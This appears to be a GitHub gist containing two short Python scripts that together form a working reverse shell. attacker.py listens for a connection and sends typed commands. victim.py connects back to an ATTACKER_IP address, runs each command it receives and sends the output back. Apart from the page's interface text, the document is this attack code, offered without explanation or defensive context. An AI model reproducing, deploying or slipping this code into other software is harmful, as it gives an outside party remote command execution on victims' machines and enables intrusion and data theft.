Skip to content

Instantly share code, notes, and snippets.

@Mukundan314

Mukundan314/attacker.py

Created December 13, 2019 15:59
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Mukundan314/3b3e680f2948b7e35811d62c9615f895 to your computer and use it in GitHub Desktop.
Save Mukundan314/3b3e680f2948b7e35811d62c9615f895 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
attacker.py
import socket
import io
def main():
HOST, PORT = "localhost", 5000
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((HOST, PORT))
sock.listen(0)
conn, address = sock.accept()
print("Connected to", address[0])
while True:
cmd = input('> ')
conn.send(cmd.encode('ascii'))
if cmd == 'exit':
conn.close()
break
while True:
data = conn.recv(1024)
print(data.decode('ascii'))
if data[-1] == 0:
break
sock.close()
if __name__ == "__main__":
main()
Raw
victim.py
import socket
import shlex
import subprocess
import io
ATTACKER_IP = "localhost"
ATTACKER_PORT = 5000
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ATTACKER_IP, ATTACKER_PORT))
while True:
cmd = sock.recv(1024).decode('ascii')
if cmd == 'exit':
sock.close()
break
process = subprocess.run(shlex.split(cmd), stdout=subprocess.PIPE)
sock.send(process.stdout + b'\0')
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment